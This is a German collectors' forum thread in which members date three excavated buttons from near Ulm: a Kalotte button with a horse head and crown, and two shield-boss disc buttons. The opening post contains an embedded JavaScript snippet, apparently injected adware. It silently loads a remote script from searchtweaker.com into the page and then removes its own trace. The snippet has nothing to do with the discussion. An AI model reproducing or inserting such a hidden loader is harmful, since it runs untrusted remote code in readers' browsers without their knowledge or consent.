[x] Bitte registrieren Sie sich um alle Funktionen des Forums nutzen zu können. Als Gast können Sie z.B. keine Bilder betrachten.

Registrieren          Schliessen
Achtung!
 >  Fundforen > Schmuck und Zierrat > Knöpfe (Moderator: Derfla) > Thema:

 Knopf mit Pferdekopf und Krone, und noch zwei große Knöpfe

Gehe zu:  
Avatar  Knopf mit Pferdekopf und Krone, und noch zwei große Knöpfe  (Gelesen 588 mal) 0
A A A A
*
0 Mitglieder und 1 Gast betrachten dieses Thema.
Seiten: 1    Nach unten
Offline
(versteckt)Themen Schreiber
#0
07. Januar 2013, um 23:14:34 Uhr

Hallo  Winken

Könnt ihr mir bitte bei der Bestimmung dieser drei Knöpfe helfen !?
Der erste würde mich am meisten interessieren,weiß nicht ob das ein neuerer Knopf ist, oder vielleicht doch etwas älteres,vielleicht ein Uniformknopf ?
Ich kann nicht genau sagen aus was für einem Material er ist,auf der Rückseite ist er jedenfalls Silbrig,über dem Silbernen ist zum großen Teil noch eine Schicht wo Goldig schimmert ( vielleicht vergoldet?? ), der Rand ist auch Silbrig und hat auch noch ein paar goldene Stellen.
Auf der Vorderseit ist in der Mitte ein Silberner Pferdekopf mit goldenem Halfter,der Pferdekopf ist auf weißem Grund mit einem goldenen Rand darum.
Denn Rest könnt ihr ja auf den Bildern erkennen, Goldener Blätterkranz und oben die Krone.

Die anderen zwei Knöpfe, sind das Trachtenknöpfe, vielleicht 18 Jhd. ??
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();


Es sind 12 Anhänge in diesem Beitrag die Sie als Gast nicht sehen können.

Bitte registrieren Sie sich um sie ansehen zu können.

DSC_0002groß.jpg
DSC_0003groß.jpg
DSC_0004groß.jpg
DSC_0005groß.jpg
DSC_0006groß.jpg
DSC_0007groß.jpg
DSC_0008groß.jpg
DSC_0009.jpg
DSC_0010.jpg
DSC_0011groß.jpg
DSC_0012.jpg
DSC_0012groß.jpg
Offline
(versteckt)
#1
07. Januar 2013, um 23:29:04 Uhr

hello die letzten Knöpfe dürften Schildbuckelknöpfe sein die sind im 16.od17.jhdt erstmals hergestellt worden.
lg schwingi

Offline
(versteckt)
#2
07. Januar 2013, um 23:38:05 Uhr

Der 1. Knopf, Kalotzknopf, Silber mit Einlagen, Pferdekopf mit Krone, dürfte ein englischer Knopf Anfang 19.Jhd. sein. Die 2 anderen Knöpfe, Scheibenknöpfe profiliert sind Ende 18.Jhd. bis 19.Jhd.
Derfla  Winken

Offline
(versteckt)
#3
07. Januar 2013, um 23:41:30 Uhr

Mit der gedrehten Rückseite und eingesetzter Öse würde ich die etwas jünger einschätzen. 17./18. Jahrhundert.

Gruß
Oetti1

Offline
(versteckt)Themen Schreiber
#4
07. Januar 2013, um 23:52:14 Uhr

Vielen Dank für eure Hilfe  Super!
Freu mich sehr über diesen schönen Knopf  Küsschen !!!



Hinzugefügt 08. Januar 2013, um 00:47:56 Uhr:

Derfla, hab gerade nach Kalotzknopf gegoogelt, da findet man nicht viel darüber.
Meinst du der Knopf ist von einer Militär Uniform ?

« Letzte Änderung: 08. Januar 2013, um 00:47:56 Uhr von (versteckt), Grund: Doppel-Beitrag zusammengefasst »

Offline
(versteckt)
#5
08. Januar 2013, um 22:17:35 Uhr

Glaube nicht, daß er von einer Militäruniform ist, dazu ist er zu aufwendig hergestellt. Kalotzknopf bedeutet, daß die Herstellung auf folgende Art gemacht wurde. Die Vorderseite wurde über die Rückseite in der die Öse verankert war am Rand übergebördelt, wobei dazwischen noch eine Füllung war,z.B. Gips,Pappe usw..Dieses Verfahren wurde Ende des 18.Jhd.in Frankreich zuerst angewandt und hat dann einen bedeutenden Fortschritt bei der Knopfherstellung gebracht.
Derfla  Winken

Offline
(versteckt)
#6
08. Januar 2013, um 23:50:27 Uhr

@Derla  liege ich wirklich falsch mit nem Schildbuckelknopf ,hab selber wenige gefunden und hier im Forum auch öfter erlebt,für mich sieht er wie so einer aus,wenn ich falsch liege,wirst du besser wissen.
lg schwingi

Offline
(versteckt)
#7
09. Januar 2013, um 00:00:25 Uhr

Hallo Schwingi!
Mit den Schildbuckelknöpfen liegst Du nicht falsch. Sind profilierte Schildbuckelknöpfe als Scheibenknöpfe. Von der Machart her Ende 18.Jhd. bis ins 19.Jhd. gehend, Rückseite abgedreht. Diese profilierten kommen hauptsächlich im Norden vor, wenier im Süden von Deutschland.Die eingegossenen Ösen findet man hier im Süden auf diese Art weniger. 16.Jhd ist ein bißchen arg früh für diese Scheibenknöpfe. Hier besteht noch ordentlich Forschungsbedarf.
Derfla  Winken

Offline
(versteckt)
#8
09. Januar 2013, um 00:02:22 Uhr

cool danke man lernt nie aus,ein Lob an unsere Spezis
lg schwingi

Offline
(versteckt)Themen Schreiber
#9
09. Januar 2013, um 01:03:46 Uhr

Von mir auch ein großes Lob  Applaus!
Die Knöpfe hab ich im Süden Deutschlands gefunden ( nahe Ulm )

Vielen Dank Derfla  Super!

Seiten: 1 
Haftungsausschluss / Nutzungsbedingungen Datenschutzerklärung Impressum Kontakt Mobile Version
Powered by SMFPacks WYSIWYG Editor